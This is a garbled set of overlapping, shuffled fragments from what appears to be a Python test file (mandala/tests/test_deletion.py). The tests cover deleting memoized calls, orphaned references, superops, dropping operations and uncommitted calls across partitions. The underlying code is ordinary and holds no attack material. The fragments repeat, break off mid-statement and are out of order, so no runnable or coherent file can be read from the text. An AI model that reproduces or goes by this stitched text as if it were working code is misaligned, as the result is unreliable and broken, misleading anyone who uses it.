"storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for", "(inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True)", "storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema", "storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in", "incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False)", "* from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################", "run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not", "* from .funcs import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts", "############################################################################ with run(storage=storage) as c: things = [] means = [] for i", "add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage)", "x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in", "c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for", "x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with", "got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do", "inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup", "if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs()", "y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23,", "cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in range(10):", "############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as", "in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs]", "[inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0]", "storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return", "df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in", "x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with", "### unit with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) ==", "nums] final = mean(x=incs) c.commit() # delete only latter part with run(storage=storage) 
as", "a workflow of several parts with run(storage=storage) as c: nums = range(10) incs", "assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with", "of several parts with run(storage=storage) as c: nums = range(10) incs = [inc(x)", "df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ #", "for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0]", "in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at", "{(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with", "for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means)", "j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc,", "delete only latter part with run(storage=storage) as c: nums = range(10) incs =", "c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################", "in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0')", "assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as", "check it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert", "delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check if things got", "i in range(10): thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing, j))", "z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42,", "@op(storage) def inc(x:int) -> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) ->", "= mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs))", "range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') #", "assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################", "% x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = 
[get_divisors(num) for", "c: for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c:", "test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c: for", "= [get_divisors(num) for num in nums] return [elt for divs in divisors_list for", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs =", "for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert", "42) c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert", "z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops():", "inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10, 20): inc(i)", "i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i", "with run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with", "assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True):", "nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage()", "get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True)", "with run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit() with run(storage,", "'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################", "df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again", "drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs))", "def get_divisors(num:int) -> TList[int]: return [x for x in range(1, num) if num", "mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop", "# delete only latter part with run(storage=storage) as c: nums = range(10) incs", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs", "range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int]) -> int:", "in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it", "= add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt)", "calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums =", "means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things = [] means", "x 
= add(23, 42) c.commit() ### delete the work with delete(storage=storage) as c:", "[inc(x) for x in nums] final = mean(x=incs) c.commit() # delete only latter", "1 @op(storage) def add(x:int, y:int) -> int: return x + y ### drop", "chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums =", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run a workflow of", "for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True)", "def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int) ->", "### do some work with run(storage=storage) as c: x = add(23, 42) c.commit()", "some work with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete", "return [x for x in range(1, num) if num % x == 0]", "assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as", "def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for", "with delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for x", "= [] for i in range(10): thing = inc(i) things.append(thing) for j in", "autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with run(storage, autocommit=False,", "means = [] for i in range(10): thing = inc(i) things.append(thing) for j", "with run(storage) as c: nums = range(10) incs = [inc(x) for x in", "parts with run(storage=storage) as c: nums = range(10) incs = [inc(x) for x", "as c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with run(storage=storage) as c:", "i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0", "c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc =", "0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c: for i", "range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i in range(10,", "range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i in range(20,", "setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ###", "= [inc(x) for x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x)", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23, 
y=42,", "schema changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int:", "-> TList[int]: return [inc(x) for x in chunk] with run(storage, autocommit=True): nums =", "as c: nums = range(10) incs = [inc(x) for x in nums] with", "assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with", "= add(23, 42) c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op,", "int: return x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add',", "in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10,", "partitions with run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit()", "run(storage=storage) as c: things = [] means = [] for i in range(10):", "assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed", "from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ###", "test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i", "nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs())", "42) c.commit() ### delete the work with delete(storage=storage) as c: x = add(23,", "for x in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x", "inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test", "range(10) incs = [inc(x) for x in nums] with c(mode=MODES.delete) as d: final", "version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit", "assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) ->", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() #", "as d: final = mean(x=incs) d.commit_deletions() # check it got deleted but earlier", "in range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) ->", "10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage,", "elt in divs] @op(storage) def inc(x:int) -> int: return x + 1 @superop(storage)", "len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work", "c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} ==", "storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only,", "== 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with", "as c: nums = range(10) incs = [inc(x) for x in nums] final", 
"len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c:", "c.commit() with run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i)", "the work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check", "x in nums] final = mean(x=incs) c.commit() # delete only latter part with", "changes across tests \"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return", "import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage", "range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 20", "range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True)", "range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]:", "run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage) as c: x,", "autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage =", "in divisors_list for elt in divs] @op(storage) def inc(x:int) -> int: return x", "get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting", "Storage() @op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int,", "= setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in range(10): inc(i)", "as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls()", "df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once", "if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list =", "assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) ->", "storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work", "storage.call_st.locs() ### do computation again with run(storage=storage) as c: x = add(23, 42)", "inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after", "work with delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check if", "range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert", "autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs())", "computation again with run(storage=storage) as c: x = add(23, 42) c.commit() with query(storage=storage)", "x = add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(),", "### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c:", "import * from .funcs import * 
def test_superops():
    storage = Storage()

    @op(storage)
    def get_divisors(num: int) -> TList[int]:
        return [x for x in range(1, num) if num % x == 0]

    @superop(storage)
    def concat_divisors(nums: TList[int]) -> TList[int]:
        divisors_list = [get_divisors(num) for num in nums]
        return [elt for divs in divisors_list for elt in divs]

    @op(storage)
    def inc(x: int) -> int:
        return x + 1

    @superop(storage)
    def inc_by_chunk(chunk: TList[int]) -> TList[int]:
        return [inc(x) for x in chunk]

    with run(storage, autocommit=True):
        nums = list(range(20))
        concat_divisors(nums=nums)
    with delete(storage, autodelete=True):
        nums = list(range(20))
        concat_divisors(nums=nums)
    assert len(storage.call_st.locs()) == 0


def test_bug():
    storage = Storage()

    @op(storage)
    def get_divisors(num: int) -> TList[int]:
        return [x for x in range(1, num) if num % x == 0]

    @superop(storage)
    def f(lst: TList[int]) -> int:
        return lst[0]

    with run(storage, autocommit=True):
        lst = get_divisors(100)
        f(lst)
    with run(storage):
        lst = get_divisors(100)
        with delete(autodelete=True):
            f(lst)
    assert f.get_table().empty
    storage.drop_instance_data(answer=True)
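# test_bug() checks emptiness through f.get_table(). A small sketch of the
# same check driven through a plain @op (added for illustration; it assumes
# get_table() is available on @op-decorated functions the same way it is on
# the @superop above -- treat that as an assumption, not documented API):

def test_superop_table_sketch():
    storage = Storage()

    @op(storage)
    def double(x: int) -> int:
        return x * 2

    @superop(storage)
    def double_all(nums: TList[int]) -> TList[int]:
        return [double(x) for x in nums]

    with run(storage, autocommit=True):
        double_all(nums=[1, 2, 3])
    assert not double.get_table().empty  # one row per constituent call
    with delete(storage, autodelete=True):
        double_all(nums=[1, 2, 3])
    assert double.get_table().empty
    storage.drop_instance_data(answer=True)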
def test_drop_op():
    """
    Tests for deleting operations are isolated to prevent schema changes
    across tests
    """
    storage = Storage()

    @op(storage)
    def inc(x: int) -> int:
        return x + 1

    @op(storage)
    def add(x: int, y: int) -> int:
        return x + y

    ### drop empty op
    storage.drop_func(f=add)
    assert not storage.op_adapter.has_op(ui_name='add', version='0')
    with run(storage, autocommit=True):
        for i in range(10):
            inc(i)
    ### drop op with results
    storage.drop_func(f=inc)
    assert not storage.op_adapter.has_op(ui_name='inc', version='0')
    # cleanup
    storage.drop_instance_data(answer=True)


def test_drop_uncommitted(setup_tests):
    storage, cts = setup_tests
    storage: Storage
    ### unit
    with run(storage, autocommit=False):
        for i in range(10):
            inc(i)
    assert len(storage.call_st.locs()) == 10
    storage.drop_uncommitted_calls()
    assert len(storage.call_st.locs()) == 0
    storage.drop_instance_data(answer=True)
    ### after committed work
    with run(storage, autocommit=False) as c:
        for i in range(10):
            inc(i)
        c.commit()
    with run(storage, autocommit=False) as c:
        for i in range(10, 20):
            inc(i)
    assert len(storage.call_st.locs()) == 20
    storage.drop_uncommitted_calls()
    assert len(storage.call_st.locs()) == 10
    storage.drop_instance_data(answer=True)
    ### test isolation of commits between partitions
    with run(storage, autocommit=False, partition='first') as c:
        for i in range(10):
            inc(i)
        c.commit()
    with run(storage, autocommit=False, partition='second') as c:
        for i in range(10, 20):
            inc(i)
    with run(storage, autocommit=False, partition='third') as c:
        for i in range(20, 30):
            inc(i)
        c.commit()
    assert len(storage.call_st.locs()) == 30
    storage.drop_uncommitted_calls()
    assert len(storage.call_st.locs()) == 20
    storage.drop_instance_data(answer=True)
autocommit=False, partition='third') as c: for", "Tests for deleting operations are isolated to prevent schema changes across tests \"\"\"", "return x + 1 @op(storage) def add(x:int, y:int) -> int: return x +", "not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ### drop", "rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True)", "in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs()", "autocommit=False, partition='third') as c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs())", "as c: x, y = Any(), Any() z = add(x, y) df =", "in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums", "assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests", "c: for i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls()", "= add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(), Any()", "<reponame>amakelov/mandala<filename>mandala/tests/test_deletion.py from .utils import * from .funcs import * from .conftest import setup_tests", "divisors_list for elt in divs] @op(storage) def inc(x:int) -> int: return x +", "concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int)", "in range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int]) ->", "with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage", "= mean(x=incs) c.commit() # delete only latter part with run(storage=storage) as c: nums", "in nums] final = mean(x=incs) c.commit() # delete only latter part with run(storage=storage)", "for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) ==", "run(storage, autocommit=False, partition='second') as c: for i in range(10, 20): inc(i) with run(storage,", "nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert", "with run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs())", "add(x:int, y:int) -> int: return x + y ### drop empty op storage.drop_func(f=add)", "in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage,", "= mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c: things =", "10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################", "# check it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True)", "y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with 
run(storage, autocommit=True):", "c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert", "c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c:", "several parts with run(storage=storage) as c: nums = range(10) incs = [inc(x) for", "return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x", "# run a workflow of several parts with run(storage=storage) as c: nums =", "deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df =", "with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the work", "num) if num % x == 0] @superop(storage) def f(lst:TList[int]) -> int: return", "only latter part with run(storage=storage) as c: nums = range(10) incs = [inc(x)", "run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\"", "final = mean(x=incs) d.commit_deletions() # check it got deleted but earlier things didn't", "mean(means) c.commit() with delete(storage=storage) as c: things = [] means = [] for", "some things only ############################################################################ # run a workflow of several parts with run(storage=storage)", "storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs()", "cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some work with", "30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 20 storage.drop_instance_data(answer=True)", "for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage,", "assert not storage.call_st.locs() ### do computation again with run(storage=storage) as c: x =", "get_divisors(num:int) -> TList[int]: return [x for x in range(1, num) if num %", "range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage)", "test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema changes across", "as c: for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as", "@superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100)", "== 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst", "delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for x in", "with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got deleted", "storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage, autocommit=True): add_three(x=23,", "0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums]", "as c: for i in range(10): 
inc(i) c.commit() with run(storage, autocommit=False, partition='second') as", "final = mean(means) c.commit() with delete(storage=storage) as c: things = [] means =", "run(storage=storage) as c: nums = range(10) incs = [inc(x) for x in nums]", "[storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not", "z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert", "add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for", "f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with", "c.commit_deletions() ### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty", "with run(storage, autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit() with", "results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts", "storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10): inc(i) ### drop op", "add(23, 42) c.commit() with query(storage=storage) as c: x, y = Any(), Any() z", "nums] return [elt for divs in divisors_list for elt in divs] @op(storage) def", "+ y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage,", "with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with", "### after committed work with run(storage, autocommit=False) as c: for i in range(10):", "c: x = add(23, 42) c.commit() with query(storage=storage) as c: x, y =", "storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage)", "Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in range(1, num)", "mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ###", "as c: things = [] means = [] for i in range(10): thing", "workflow of several parts with run(storage=storage) as c: nums = range(10) incs =", "= storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls", "\"\"\" storage = Storage() @op(storage) def inc(x:int) -> int: return x + 1", "check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not", "== 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in", "operations are isolated to prevent schema changes across tests \"\"\" storage = Storage()", "i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i", "test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x", "autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 
20", "things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as", "op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with run(storage, autocommit=True): for i in range(10):", "earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True)", "############################################################################ with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5)", "x in range(1, num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int])", "f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent", "-> int: return x + 1 @op(storage) def add(x:int, y:int) -> int: return", "assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs", ".conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit", "'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True)", "= mean(means) c.commit() with delete(storage=storage) as c: things = [] means = []", "not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = 